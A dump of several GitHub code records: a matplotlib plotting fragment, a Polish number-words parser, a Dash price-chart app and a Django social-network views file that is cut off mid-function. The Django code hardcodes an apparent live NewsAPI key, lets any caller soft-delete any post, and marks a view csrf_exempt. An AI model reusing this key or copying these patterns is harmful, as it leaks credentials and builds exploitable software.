0].set_ylabel('$N_{i}$\\n($cm^{-3}$)')\n axes[3, 0].set_xticks([])\n axes[3, 0].set_xlabel('')\n axes[3, 0].set_title('')\n\n plot_1D(BV_data, axes[4, 0])\n axes[4, 0].set_ylabel('V\\n(km/s)')\n # axes[4, 0].set_ylim(200, 200)\n axes[4, 0].set_xticks([])\n axes[4, 0].set_xlabel('')\n axes[4, 0].set_title('')\n\n plot_1D(abs, axes[5, 0])\n axes[5, 0].set_ylabel('ABS')\n axes[5, 0].set_xticks([])\n axes[5, 0].set_xlabel('')\n axes[5, 0].set_title('')\n\n plot_1D(gls, axes[6, 0])\n axes[6, 
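The ABS/GLS/SITL panels are drawn as step traces: each selection contributes four (t, x) points that rise to its FOM and fall back to zero. The same construction on stand-in selection objects:

class FakeSelection:
    # Stand-in for the selection objects used above (tstart/tstop/fom assumed)
    def __init__(self, tstart, tstop, fom):
        self.tstart, self.tstop, self.fom = tstart, tstop, fom

t, x = [], []
for sel in [FakeSelection(0, 10, 120), FakeSelection(20, 30, 80)]:
    t.extend([sel.tstart, sel.tstart, sel.tstop, sel.tstop])
    x.extend([0, sel.fom, sel.fom, 0])
assert x == [0, 120, 120, 0, 0, 80, 80, 0]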
0].set_ylabel('GLS')\n axes[6, 0].set_ylim(0, 200)\n axes[6, 0].set_xticks([])\n axes[6, 0].set_xlabel('')\n axes[6, 0].set_title('')\n\n plot_1D(sitl, axes[7, 0])\n axes[7, 0].set_ylabel('SITL')\n axes[7, 0].set_title('')\n axes[7, 0].xaxis.set_major_locator(locator)\n axes[7, 0].xaxis.set_major_formatter(formatter)\n for tick in axes[7, 0].get_xticklabels():\n tick.set_rotation(45)\n\n # Set a common time range\n plt.setp(axes, xlim=mdates.date2num([start_date, end_date]))\n plt.subplots_adjust(left=0.27, right=0.85, top=0.93)\n return fig, axes\n()","repo_name":"Riley-Powell/RP-MMS-Research","sub_path":"time_to_orbit.py","file_name":"time_to_orbit.py","file_ext":"py","file_size_in_byte":151591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14046174918","text":"# zad 1 lista 5\n\ndef text2int(textnum, numwords={}):\n if not numwords:\n units = [\"zero\", \"jeden\", \"dwa\", \"trzy\", \"cztery\", \"piec\", \"szesc\", \"siedem\", \"osiem\",\n \"dziewiec\", \"dziesiec\", \"jedenascie\", \"dwanascie\", \"trzynascie\", \"czternascie\", \"pietnascie\",\n \"szesnascie\", \"siedemnascie\", \"osiemanscie\", \"dziewietnascie\",]\n\n tens = [\"\", \"\", \"dwadziescia\", \"trzydziesci\", \"czterdziesci\", \"piecdziesiat\", \"szescdziesiat\", \"siedemdziesiat\", \"osiemdziesiat\", \"dziewiecdziesiat\"]\n\n scales = [\"sto\", \"tysiac\", \"milion\", \"miliard\", \"bilion\"]\n\n numwords[\"and\"] = (1, 0)\n for idx, word in enumerate(units): numwords[word] = (1, idx)\n for idx, word in enumerate(tens): numwords[word] = (1, idx * 10)\n for idx, word in enumerate(scales): numwords[word] = (10 ** (idx * 3 or 2), 0)\n\n current = result = 0\n for word in textnum.split():\n if word not in numwords:\n raise Exception(\"nie poprawna nazwa: \" + word)\n\n scale, increment = numwords[word]\n current = current * scale + increment\n if scale > 100:\n result += current\n current = 0\n\n return result + current\n\n#print(text2int(\"seven billion one hundred million thirty one thousand three hundred thirty seven\"))\n#7100031337\n\n#print(text2int(\"piec\"))\n\nprint(\"podaj liczbe slownie bez znakow polskich\")\ntekst = str(input())\nprint(text2int(tekst))","repo_name":"Ustregal/JSP2019","sub_path":"lista5/Z1L5.py","file_name":"Z1L5.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13273711673","text":"import pandas as pd\nimport dash\nimport dash_html_components as html\nimport dash_core_components as dcc\nimport plotly.graph_objs as go\nfrom matplotlib import pyplot as plt\nimport seaborn as sns\nfrom datetime import datetime\nfrom textwrap import dedent\n# Plotly\nimport plotly.plotly as py\nimport plotly.tools as tls\n# fig_to_uri\nfrom io import BytesIO\nimport base64\n# To register the converters:\nfrom pandas.plotting import register_matplotlib_converters\nregister_matplotlib_converters()\n\ncommodities = ['broccoli', 'iceberg_lettuce', 'potatoes', 'tomatoes']\n\ndef fig_to_uri(in_fig, close_all=True, **save_args):\n # type: (plt.Figure) -> str\n \"\"\"\n Save a figure as a URI\n :param in_fig:\n :return:\n \"\"\"\n out_img = BytesIO()\n in_fig.savefig(out_img, format='png', **save_args)\n if close_all:\n in_fig.clf()\n plt.close('all')\n out_img.seek(0) # rewind file\n encoded = base64.b64encode(out_img.read()).decode(\"ascii\").replace(\"\\n\", \"\")\n return \"data:image/png;base64,{}\".format(encoded)\n\n# Converting to Plotly's Figure 
\n\n# Converting the Matplotlib figure to a Plotly figure (optional, unused here):\n# plotly_fig = tls.mpl_to_plotly(fig_plot_save_produce)\n\n# Dash app\napp = dash.Dash()\n\nserver = app.server\n\napp.layout = html.Div([\n    html.H1('Forecasting agricultural product price',\n            ),\n\n    dcc.Markdown(dedent('''\n    ## Show farm-gate price and retail price for selected commodity\n\n    Please select a commodity\n    ''')\n    ),\n\n    dcc.Dropdown(\n        id='product-dropdown',\n        options=[{'label': i, 'value': i} for i in commodities],\n        multi=False,\n        value='broccoli'\n    ),\n    html.Div([html.Img(id='product_plot', style={\n        'height': '50%',\n        'width': '50%',\n        'float': 'left',\n        'position': 'relative',\n        'padding-top': 0,\n        'padding-right': 0\n    })])\n\n])\n\n@app.callback(\n    dash.dependencies.Output('product_plot', 'src'),\n    [dash.dependencies.Input('product-dropdown', 'value')])\ndef update_figure(product_name):\n\n    input_data = pd.read_csv('../Data/farm-to-retail-price/' + product_name + '.csv')\n\n    # Date to Index\n    input_data.index = input_data[\"Year\"]\n    del input_data[\"Year\"]\n\n    plt.rcParams['xtick.labelsize'] = 14\n    plt.rcParams['ytick.labelsize'] = 14\n    plt.figure(figsize=(10, 5))\n    plt.xticks(rotation=45)\n\n    datelist = pd.to_datetime(input_data.index, format='%Y')\n    plt.plot_date(datelist, input_data['Retail'], '-o')\n    plt.plot_date(datelist, input_data['Farm'], '-o')\n\n    graphtitle = product_name\n\n    plt.xlabel('Date', fontsize=14)\n    plt.ylabel('Price (cents/lb)', fontsize=14)\n    plt.title(graphtitle)\n    plt.legend(loc='best')\n\n    # Passing the pyplot module works: plt.savefig() saves the current figure.\n    out_url = fig_to_uri(plt)\n\n    return out_url\n\n\nif __name__ == '__main__':\n    app.run_server(debug=True)\n","repo_name":"hyungsuk-son/forecasting-price-spread","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
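# [Editor's note] The app above follows a common Dash pattern: a dropdown Input
# drives a callback whose Output is the src of an html.Img, fed by a matplotlib
# figure converted to a data URI. A stripped-down sketch of the same wiring
# (component ids here are illustrative, not from the source):

import dash
import dash_core_components as dcc
import dash_html_components as html

app = dash.Dash()
app.layout = html.Div([
    dcc.Dropdown(id='choice',
                 options=[{'label': c, 'value': c} for c in ['a', 'b']],
                 value='a'),
    html.Img(id='plot'),
])

@app.callback(dash.dependencies.Output('plot', 'src'),
              [dash.dependencies.Input('choice', 'value')])
def render_plot(choice):
    # Build a matplotlib figure for `choice`, then return fig_to_uri(...)
    # as in the app above; an empty src is returned in this stub.
    return ''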
+{"seq_id":"15881287536","text":"import json\nimport phonenumbers\nfrom datetime import datetime\nfrom phonenumbers import geocoder\nfrom phonenumbers import carrier\nimport string, random\nfrom django.db.models import Q\n\nfrom django.http import HttpResponse, HttpResponseRedirect\n\nfrom django.shortcuts import render, redirect\n\n# Create your views here.\nfrom social.models import Post, Report\n\nfrom social.forms import PostForm\n\nfrom byhand.models import Follow, UserExtend, CustomUser, Bio\nfrom longprofile.models import Follow2, Endorse, Connection\n\nfrom social.models import Like, Comment, Achievement, Projects, Cexepertise, About, Expertise, Achievements, Experience, Certificate, Enquiry, Testimonial, Client, Branch, Working, Notification, Brousher, Cards, Image, Documents, Location\n\nfrom social.forms import WorkingForm, AboutForm, ClientForm\nfrom googletrans import Translator\nfrom django.forms import modelformset_factory\nfrom django.contrib.auth.decorators import login_required\n\nfrom django.http import JsonResponse\nfrom django.core import serializers\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.shortcuts import get_object_or_404\n\nfrom social.forms import ExpertiseForm, AchievementsForm, ProjectsForm, ExperienceForm, TestimonialForm, CertificateForm, BranchForm\nfrom newsapi import NewsApiClient\nfrom longprofile.models import *\n\n@login_required(login_url = 'login')\ndef PostView(request):\n    form = PostForm()\n    if request.method == 'POST':\n        form = PostForm(request.POST, request.FILES)\n        if form.is_valid():\n            post = form.save(commit=False)\n            post.user_id = request.user.id\n            post.privacy = request.POST.get('privacy')\n            post.save()\n    return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n@login_required(login_url = 'login')\ndef index(request):\n    company = request.user.groups.filter(name='COMPANY').exists()\n\n    fol = Follow.objects.filter(follower_id = request.user.id)\n\n    group_ids = []\n    for i in fol:\n        group_ids.append(i.following_id)\n\n    post_items = Post.objects.filter(user_id__in=group_ids).all()\n\n    liked = Like.objects.filter(user_id=request.user.id).exists()\n\n    if request.method == \"POST\":\n        id = request.POST.get('id')\n        comment = request.POST.get('comment')\n        commentv = Comment()\n        commentv.comment = comment\n        commentv.post_id = id\n        commentv.user_id = request.user.id\n        commentv.save()\n\n        # keep the denormalized comment counter on Post in sync\n        post = Post.objects.get(id = id)\n        post.comments = post.comments + 1\n        post.save()\n\n    context = {\n        'liked': liked,\n        'post_items': post_items,\n        'company': company,\n    }\n\n    return render(request, 'index.html', context)\n\n\n@login_required(login_url = 'login')\ndef timeline(request):\n    try:\n        userextend = UserExtend.objects.get(user_id = request.user.id)\n    except UserExtend.DoesNotExist:\n        return redirect('register_as')\n\n    newsapi = NewsApiClient(api_key='c0418e40b3a04a9b8e853126e29d8f7a')\n    top_headlines = newsapi.get_top_headlines(q='covid', language='en', country='in')\n    ntitle = top_headlines['articles'][0]['title']\n    ndes = top_headlines['articles'][0]['description']\n    nurl = top_headlines['articles'][0]['url']\n    nimg = top_headlines['articles'][0]['urlToImage']\n\n    company = request.user.groups.filter(name='COMPANY').exists()\n    try:\n        bioview = Bio.objects.get(user_id = request.user.id)\n    except Bio.DoesNotExist:\n        bioview = \"\"\n\n    fol = Follow2.objects.filter(following_id=request.user.id)\n\n    group_ids = [request.user.id]\n    for i in fol:\n        group_ids.append(i.follower_id)\n\n    post_items = Post.objects.filter(user_id__in=group_ids, privacy = 1, is_deleted = 0).all()\n\n    # NOTE: the two lookups below run one query per post; a batched\n    # alternative is sketched further below.\n    liked_posts = [i for i in post_items if Like.objects.filter(post_id = i, user_id = request.user.id)]\n\n    comments = [i for i in post_items if Comment.objects.filter(post_id = i)]\n\n    context = {\n        'userextend': userextend,\n        'post_items': post_items,\n        'liked_posts': liked_posts,\n        'comments': comments,\n        'bioview': bioview,\n        'company': company,\n        'ntitle': ntitle,\n        'ndes': ndes,\n        'nurl': nurl,\n        'nimg': nimg\n    }\n    return render(request, 'timeline/timeline.html', context)\n\n\n@login_required(login_url = 'login')\ndef like(request, id):\n    # if liked:\n    # dislike = Like.objects.filter(post_id = id)\n    # dislike.delete()\n    # liked = False\n    # return 
HttpResponse('true')\n # else:\n\n\n like=Like()\n like.user_id = request.user.id\n like.post_id = id\n like.save()\n\n post = Post.objects.get(id=id)\n current_like = post.likes\n post.likes = current_like +1\n post.save()\n return redirect('index')\n\n@login_required(login_url = 'login')\ndef dislike(request,id):\n dislike = Like.objects.filter(post_id = id)\n dislike.delete()\n\n post = Post.objects.get(id=id)\n current_like = post.likes\n post.likes = current_like - 1\n post.save()\n return redirect('index')\n\n\n@login_required(login_url = 'login')\ndef postlike(request,id):\n \n liked = Like.objects.filter(user_id = request.user.id,post_id = id)\n lc = Like.objects.filter(post_id = id).count()\n \n\n post = Post.objects.get(id = id)\n p = post.user.id\n \n is_liked = True if liked else False\n if is_liked:\n liked.delete()\n notify = Notification.objects.filter(post = post ,sender = request.user.id,notification_type = 1)\n notify.delete()\n is_liked = False\n lcn = Like.objects.filter(post_id = id).count()\n\n else:\n like = Like()\n like.user_id = request.user.id\n like.post_id = id\n like.save()\n notify = Notification()\n notify.post_id = id\n \n if request.user.id != post.user.id:\n notify.sender_id = request.user.id\n notify.user_id = p\n notify.notification_type= 1\n notify.save()\n is_liked = True\n lcn = Like.objects.filter(post_id = id).count()\n\n resp = {\n \"liked\":is_liked,\n \"post_id\":id,\n \"lcn\":lcn,\n }\n response = json.dumps(resp)\n return HttpResponse(response, content_type=\"application/json\")\n\n\n@login_required(login_url = 'login')\n\ndef likecount(request,id):\n likescount = Like.objects.filter(post_id = id).count()\n\n return render(request,'index.html',{'likescount':likescount})\n\n# def comment(request):\n#\n# return HttpResponse('sucess')\n#\n# return render(request,'index.html')\n\n\n@login_required(login_url = 'login')\ndef post_detail(request,id):\n company = request.user.groups.filter(name='COMPANY').exists()\n digits = ''.join(random.sample(string.digits, 2))\n chars = ''.join(random.sample(string.ascii_lowercase, 3))\n \n\n liked_posts = Like.objects.filter(user_id = request.user.id,post_id = id)\n post = Post.objects.get(id=id)\n comment = Comment.objects.filter(post_id = id)\n\n context = {\n 'post':post,\n 'comment':comment,\n 'liked_posts':liked_posts,\n 'company':company\n }\n return render(request,'timeline/post_details_page.html',context)\n\n\n\n\n@login_required(login_url = 'login')\ndef comment(request):\n if request.method == \"POST\":\n post = request.POST.get('commentid')\n commentfeed = request.POST.get('comments')\n\n postid = int(post)\n p = Post.objects.get(id = postid)\n \n sender = p.user.id\n \n comment = Comment()\n comment.post_id = post\n comment.user_id = request.user.id\n \n comment.comment = commentfeed\n comment.save()\n\n # bio = Bio.objects.get(id = request.user.id)\n # profile = bio.image\n\n notify = Notification()\n notify.post_id = post\n notify.user_id = sender\n if request.user.id != p.user.id:\n \n notify.sender_id =request.user.id\n notify.notification_type = 2\n notify.save()\n\n comment_list = []\n\n comment_list = [{\n \"sender\" : request.user.id,\n \"comment\": commentfeed,\n }]\n\n return JsonResponse(comment_list, safe=False)\n\n\n\n # return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n \n \n@login_required(login_url = 'login')\n@csrf_exempt\ndef postreport(request):\n if request.method == \"POST\":\n postid = request.POST.get('postid')\n report = request.POST.get('gender')\n \n \n 
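# [Editor's note] timeline()/index() above test likes with one
# Like.objects.filter(...) query per post (an N+1 pattern). A batched sketch
# using a single values_list() query, assuming the Like model's `post` foreign
# key as used above, with the variable names from timeline():
#
#     liked_ids = set(Like.objects
#                     .filter(user_id=request.user.id, post__in=post_items)
#                     .values_list('post_id', flat=True))
#     liked_posts = [p for p in post_items if p.id in liked_ids]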
postreport = Report()\n postreport.post_id = postid\n postreport.content = report\n postreport.reporter_id =request.user.id\n postreport.save()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n \n\n\ndef postDelete(request):\n a = request.POST.get('id')\n d = Post.objects.get(pk=a)\n d.is_deleted = 1\n d.save()\n return HttpResponse('')\n\n@login_required(login_url = 'login')\ndef enquiry(request):\n if request.method == \"POST\":\n enquirytitle = request.POST.get('enquiry-name')\n enquirydescription = request.POST.get('enquiry-description')\n\n enquiry = Enquiry()\n enquiry.user_id = request.user.id\n enquiry.title = enquirytitle\n enquiry.description = enquirydescription\n enquiry.save()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n\n@login_required(login_url = 'login')\ndef profile(request):\n \n\n return render(request,'profile/profile.html')\n\n\n@login_required(login_url = 'login')\ndef companyprofile(request):\n print(request.user.id)\n \n try:\n userextend = UserExtend.objects.get(user_id = request.user.id)\n except:\n return redirect('register_as')\n \n company = request.user.groups.filter(name='COMPANY').exists()\n \n\n try:\n bioview = Bio.objects.get(user_id = request.user.id)\n except:\n bioview =\"\"\n \n try:\n location = Location.objects.get(user_id = request.user.id)\n except:\n location = ''\n \n try:\n abouth = Aboutdetails.objects.get(user_id=request.user.id)\n except:\n abouth = \"\"\n\n \n form = WorkingForm()\n expertiselist = Expertise.objects.filter(user_id=request.user.id)\n achievements = Achievements.objects.filter(user_id=request.user.id)\n projects = Projects.objects.filter(user_id=request.user.id)\n certificates = Certificate.objects.filter(user_id=request.user.id)\n clients = Client.objects.filter(user_id = request.user.id)\n branches = Branch.objects.filter(user_id = request.user.id)\n\n testimonial = Testimonial.objects.filter(user_id= request.user.id)\n companies = CustomUser.objects.all()\n AchievementFormSet = modelformset_factory(Achievement, fields=('name',), extra=3)\n formset = AchievementFormSet(queryset=Achievement.objects.filter(user_id=request.user.id))\n \n following_count = Follow2.objects.filter(following_id = request.user.id).count()\n follower_count = Follow2.objects.filter(follower_id = request.user.id).count()\n endorse_count = Endorse.objects.filter(liked_person_id =request.user.id).count()\n connection_count = Connection.objects.filter(Q(connected_person_id=request.user.id, connection=1) | Q(user_id=request.user.id, connection=1)).count()\n try:\n about = About.objects.get(user_id = request.user.id).about\n a = 1\n \n except:\n about = \"None\"\n a = 2\n \n\n\n try:\n monview = Working.objects.get(day =1 , user_id = request.user.id)\n \n except:\n monview = ''\n \n\n try:\n tueview = Working.objects.get(day =2,user_id = request.user.id )\n \n except:\n tueview = ''\n \n\n try:\n wedview = Working.objects.get(day =3,user_id = request.user.id )\n \n except:\n wedview = ''\n \n\n try:\n thuview = Working.objects.get(day =4,user_id = request.user.id )\n \n except:\n thuview = ''\n \n\n try:\n friview = Working.objects.get(day =5,user_id = request.user.id )\n \n except:\n friview = ''\n \n\n try:\n satview = Working.objects.get(day =6,user_id = request.user.id )\n \n except:\n satview = ''\n \n\n try:\n sunview = Working.objects.get(day =7,user_id = request.user.id )\n \n except:\n sunview = ''\n \n\n\n context = {\n 'form':form,\n 'formset':formset,\n 'userextend':userextend,\n 'about':about,\n 
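# [Editor's note] postDelete() above soft-deletes by setting is_deleted = 1,
# and timeline() filters on is_deleted = 0 by hand. A common alternative is a
# custom manager that hides deleted rows everywhere; a sketch, not part of
# this codebase:
#
#     class VisiblePostManager(models.Manager):
#         def get_queryset(self):
#             return super().get_queryset().filter(is_deleted=0)
#
#     class Post(models.Model):
#         ...
#         objects = models.Manager()      # all rows, including soft-deleted
#         visible = VisiblePostManager()  # Post.visible.all() hides them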
'expertiselist':expertiselist,\n 'achievements':achievements,\n 'projects':projects,\n 'certificates':certificates,\n 'companies':companies,\n 'clients':clients,\n 'branches':branches,\n 'testimonial':testimonial,\n 'monview':monview,\n 'tueview':tueview,\n 'wedview':wedview,\n 'thuview':thuview,\n 'friview':friview,\n 'satview':satview,\n 'sunview':sunview,\n 'bioview':bioview,\n 'company':company,\n 'location':location,\n \n 'following_count':following_count,\n 'follower_count':follower_count,\n 'endorse_count':endorse_count,\n 'connection_count':connection_count,\n 'abouth':abouth,\n\n }\n return render(request,'profile/profile-company-edit.html',context)\n\n@login_required(login_url = 'login')\ndef userprofile(request):\n \n try:\n userextend = UserExtend.objects.get(user_id = request.user.id)\n except:\n return redirect('register_as')\n company = request.user.groups.filter(name='COMPANY').exists()\n\n \n all_users = CustomUser.objects.values_list('first_name', flat=True)\n \n all_img = Bio.objects.all().distinct()\n try:\n abouth = Aboutdetails.objects.get(user_id=request.user.id)\n except:\n abouth = \"\"\n\n try:\n bioview = Bio.objects.get(user_id = request.user.id)\n except:\n bioview =\"\"\n \n try:\n location = Location.objects.get(user_id = request.user.id)\n except:\n location = ''\n\n \n\n Company = CustomUser.objects.filter(groups__name = \"COMPANY\")\n \n companies = CustomUser.objects.all()\n expertiselist = Expertise.objects.filter(user_id = request.user.id)\n achievements = Achievements.objects.filter(user_id = request.user.id)\n projects = Projects.objects.filter(user_id = request.user.id)\n experiences = Experience.objects.filter(user_id = request.user.id)\n certificates = Certificate.objects.filter(user_id= request.user.id)\n testimonials = Testimonial.objects.filter(user_id = request.user.id)\n clients = Client.objects.filter(user_id = request.user.id)\n n = len(certificates)\n \n following_count = Follow2.objects.filter(following_id = request.user.id).count()\n follower_count = Follow2.objects.filter(follower_id = request.user.id).count()\n endorse_count = Endorse.objects.filter(liked_person_id =request.user.id).count()\n connection_count = Connection.objects.filter(Q(connected_person_id=request.user.id, connection=1) | Q(user_id=request.user.id, connection=1)).count()\n \n\n try:\n monview = Working.objects.get(day =1 ,user_id = request.user.id)\n \n except:\n monview = ''\n \n\n\n try:\n tueview = Working.objects.get(day =2,user_id = request.user.id )\n \n except:\n tueview = ''\n \n\n try:\n wedview = Working.objects.get(day =3, user_id = request.user.id)\n \n except:\n wedview = ''\n \n\n try:\n thuview = Working.objects.get(day =4,user_id = request.user.id )\n \n except:\n thuview = ''\n \n\n try:\n friview = Working.objects.get(day =5,user_id = request.user.id )\n \n except:\n friview = ''\n \n\n try:\n satview = Working.objects.get(day =6,user_id = request.user.id )\n \n except:\n satview = ''\n \n\n try:\n sunview = Working.objects.get(day =7,user_id = request.user.id )\n \n except:\n sunview = ''\n \n\n\n context = {\n 'companies':companies,\n 'userextend':userextend,\n 'expertiselist':expertiselist,\n 'achievements':achievements,\n 'projects':projects,\n 'experiences':experiences,\n 'certificates':certificates,\n 'testimonials':testimonials,\n 'clients':clients,\n 'monview': monview,\n 'tueview': tueview,\n 'wedview': wedview,\n 'thuview': thuview,\n 'friview': friview,\n 'satview': satview,\n 'sunview': sunview,\n 'bioview':bioview,\n 'Company':Company,\n 
'company':company,\n 'location':location,\n 'all_users': all_users,\n 'all_img':all_img,\n \n 'following_count':following_count,\n 'follower_count':follower_count,\n 'endorse_count':endorse_count,\n 'connection_count':connection_count,\n 'abouth':abouth,\n \n \n\n }\n\n return render(request,'profile/profile-user-edit.html',context)\n\n\n@login_required(login_url = 'login')\ndef companyprofileview(request,id):\n \n company = request.user.groups.filter(name='COMPANY').exists()\n try:\n about = About.objects.get(user_id = id)\n except:\n about = \"\"\n is_following = Follow2.objects.filter(following_id=request.user.id, follower_id=id)\n instance = CustomUser.objects.get(id = id)\n userextend = UserExtend.objects.get(user_id=id)\n otheruser = int(id)\n otherusertb = CustomUser.objects.get(id= id)\n \n try:\n bioview = Bio.objects.get(user_id = id)\n except:\n bioview =\"\"\n \n try:\n location = Location.objects.get(user_id = id)\n except:\n location = ''\n \n print(location)\n\n try:\n abouth = Aboutdetails.objects.get(user_id=request.user.id)\n except:\n abouth = \"\"\n\n\n\n expertiselist = Expertise.objects.filter(user_id=id)\n achievements = Achievements.objects.filter(user_id=id)\n projects = Projects.objects.filter(user_id=id)\n certificates = Certificate.objects.filter(user_id=id)\n clients = Client.objects.filter(user_id=id)\n branches = Branch.objects.filter(user_id=id)\n experiences = Experience.objects.filter(user_id=id)\n\n testimonial = Testimonial.objects.filter(user_id=id)\n \n following_count = Follow2.objects.filter(following_id = id).count()\n follower_count = Follow2.objects.filter(follower_id = id).count()\n endorse_count = Endorse.objects.filter(liked_person_id =id).count()\n connection_count = Connection.objects.filter(Q(connected_person_id=id, connection=1) | Q(user_id=id, connection=1)).count()\n \n is_following = Follow2.objects.filter(following_id = request.user.id, follower_id = id)\n endorse = Endorse.objects.filter(user_id = request.user.id, liked_person_id = id)\n if Connection.objects.filter(user_id = request.user.id, connected_person_id = id, connection = 0):\n is_connection = \"requested\"\n \n elif Connection.objects.filter(Q(connected_person_id=request.user.id, user_id=id, connection=1) | Q(user_id=request.user.id, connected_person_id=id, connection=1)):\n is_connection = \"connected\"\n \n else:\n is_connection = \"notConnected\"\n\n try:\n rating_view = Rating.objects.filter(rated_person = id).aggregate(Sum('rating'))\n rating_count = Rating.objects.filter(rated_person = id).count()\n e = (rating_view['rating__sum'])\n rating = e/rating_count\n except:\n rating = 0\n \n \n \n \n \n try:\n monview = Working.objects.get(day =1 ,user_id = id)\n \n except:\n monview = ''\n \n\n\n try:\n tueview = Working.objects.get(day =2,user_id = id )\n \n except:\n tueview = ''\n \n\n try:\n wedview = Working.objects.get(day =3, user_id = id)\n \n except:\n wedview = ''\n \n\n try:\n thuview = Working.objects.get(day =4,user_id = id )\n \n except:\n thuview = ''\n \n\n try:\n friview = Working.objects.get(day =5,user_id = id )\n \n except:\n friview = ''\n \n\n try:\n satview = Working.objects.get(day =6,user_id = id )\n \n except:\n satview = ''\n \n\n try:\n sunview = Working.objects.get(day =7,user_id = id )\n \n except:\n sunview = ''\n \n\n context = {\n 'about':about,\n 'expertiselist': expertiselist,\n 'otheruser':otheruser,\n 'otherusertb':otherusertb,\n 'achievements': achievements,\n 'projects': projects,\n 'certificates': certificates,\n 'clients': clients,\n 
'userextend':userextend,\n 'branches': branches,\n 'testimonial': testimonial,\n 'experiences':experiences,\n 'bioview':bioview,\n 'monview': monview,\n 'tueview': tueview,\n 'wedview': wedview,\n 'thuview': thuview,\n 'friview': friview,\n 'satview': satview,\n 'sunview': sunview,\n 'connection':is_following,\n 'instance':instance,\n 'company' :company,\n \n 'following_count':following_count,\n 'follower_count':follower_count,\n 'endorse_count':endorse_count,\n 'connection_count':connection_count,\n \n 'connection':is_following,\n 'endorse':endorse,\n 'is_connection':is_connection,\n \n 'location':location,\n 'rating':rating,\n 'abouth':abouth,\n }\n return render(request,'profile/profile-company.html',context)\n\n\n@login_required(login_url = 'login')\ndef userprofileview(request ,id):\n company = request.user.groups.filter(name='COMPANY').exists()\n otheruser = id\n otherusertb = CustomUser.objects.get(id= id)\n instance = CustomUser.objects.get(id=id)\n is_following = Follow2.objects.filter(following_id=request.user.id, follower_id=id)\n userextend = UserExtend.objects.get(user_id=id)\n try:\n bioview = Bio.objects.get(user_id = id)\n except:\n bioview =\"\"\n \n try:\n location = Location.objects.get(user_id = id)\n except:\n location = ''\n\n #star rating view\n try:\n rating_view = Rating.objects.filter(rated_person = id).aggregate(Sum('rating'))\n rating_count = Rating.objects.filter(rated_person = id).count()\n e = (rating_view['rating__sum'])\n rating = e/rating_count\n except:\n rating = 0\n\n try:\n abouth = Aboutdetails.objects.get(user_id=id)\n except:\n abouth = \"\"\n\n expertiselist = Expertise.objects.filter(user_id=id)\n achievements = Achievements.objects.filter(user_id=id)\n projects = Projects.objects.filter(user_id=id)\n experiences = Experience.objects.filter(user_id=id)\n certificates = Certificate.objects.filter(user_id=id)\n testimonials = Testimonial.objects.filter(user_id=id)\n clients = Client.objects.filter(user_id=id)\n \n following_count = Follow2.objects.filter(following_id = id).count()\n follower_count = Follow2.objects.filter(follower_id = id).count()\n endorse_count = Endorse.objects.filter(liked_person_id =id).count()\n connection_count = Connection.objects.filter(Q(connected_person_id=id, connection=1) | Q(user_id=id, connection=1)).count()\n \n is_following = Follow2.objects.filter(following_id = request.user.id, follower_id = id)\n endorse = Endorse.objects.filter(user_id = request.user.id, liked_person_id = id)\n if Connection.objects.filter(user_id = request.user.id, connected_person_id = id, connection = 0):\n is_connection = \"requested\"\n elif Connection.objects.filter(Q(connected_person_id=request.user.id, user_id=id, connection=1) | Q(user_id=request.user.id, connected_person_id=id, connection=1)):\n is_connection = \"connected\"\n else:\n is_connection = \"notConnected\"\n \n \n \n \n try:\n monview = Working.objects.get(day =1 ,user_id =id)\n \n except:\n monview = ''\n \n\n\n try:\n tueview = Working.objects.get(day =2,user_id = id )\n \n except:\n tueview = ''\n \n\n try:\n wedview = Working.objects.get(day =3, user_id = id)\n \n except:\n wedview = ''\n \n\n try:\n thuview = Working.objects.get(day =4,user_id = id )\n \n except:\n thuview = ''\n \n\n try:\n friview = Working.objects.get(day =5,user_id = id )\n \n except:\n friview = ''\n \n\n try:\n satview = Working.objects.get(day =6,user_id = id )\n \n except:\n satview = ''\n \n\n try:\n sunview = Working.objects.get(day =7,user_id = id )\n \n except:\n sunview = ''\n\n try:\n 
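# [Editor's note] The seven try/except blocks that fetch Working rows for
# day = 1..7 (repeated across the profile views above) can collapse into one
# dict comprehension; .first() returns None instead of raising. A sketch using
# the same Working model and the '' fallback the views use:
#
#     working_by_day = {
#         day: Working.objects.filter(user_id=request.user.id, day=day).first() or ''
#         for day in range(1, 8)
#     }
#     monview, tueview = working_by_day[1], working_by_day[2]  # and so on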
abouth = Aboutdetails.objects.get(user_id=id)\n except:\n abouth = \"\"\n \n\n context = {\n\n 'expertiselist': expertiselist,\n 'userextend':userextend,\n 'otheruser':otheruser,\n 'achievements': achievements,\n 'projects': projects,\n 'experiences': experiences,\n 'certificates': certificates,\n 'testimonials': testimonials,\n 'otherusertb':otherusertb,\n\n 'clients': clients,\n 'bioview':bioview,\n 'monview': monview,\n 'tueview': tueview,\n 'wedview': wedview,\n 'thuview': thuview,\n 'friview': friview,\n 'satview': satview,\n 'sunview': sunview,\n 'connection': is_following,\n 'instance': instance,\n 'company':company,\n \n 'following_count':following_count,\n 'follower_count':follower_count,\n 'endorse_count':endorse_count,\n 'connection_count':connection_count,\n \n 'connection':is_following,\n 'endorse':endorse,\n 'is_connection':is_connection,\n \n 'location':location,\n 'rating':rating,\n 'abouth':abouth,\n \n \n \n\n }\n return render(request,'profile/profile-user.html',context)\n\n\n@login_required(login_url = 'login')\ndef experience(request):\n return render(request,'profile/experience.html')\n\n@login_required(login_url = 'login')\ndef experiencelist(request,id):\n experiences = Experience.objects.filter(user_id = id)\n context = {\n 'experiences':experiences,\n }\n return render(request,'profile/experiencelist.html',context)\n\n\n##############adding working hours #############\n\n@login_required(login_url = 'login')\ndef addworking(request):\n\n try:\n\n \n mondview = Working.objects.get(user_id=request.user.id,day = 1)\n\n \n\n if request.method == \"POST\":\n Moncheck = request.POST.get('moncheck')\n Monstart = request.POST.get('monstartime')\n\n Monend = request.POST.get('monendtime')\n MonBrk1st = request.POST.get('monbreaktime1st')\n MonBrk1en = request.POST.get('monbreaktime1en')\n MonBrk2st = request.POST.get('monbreaktime2st')\n 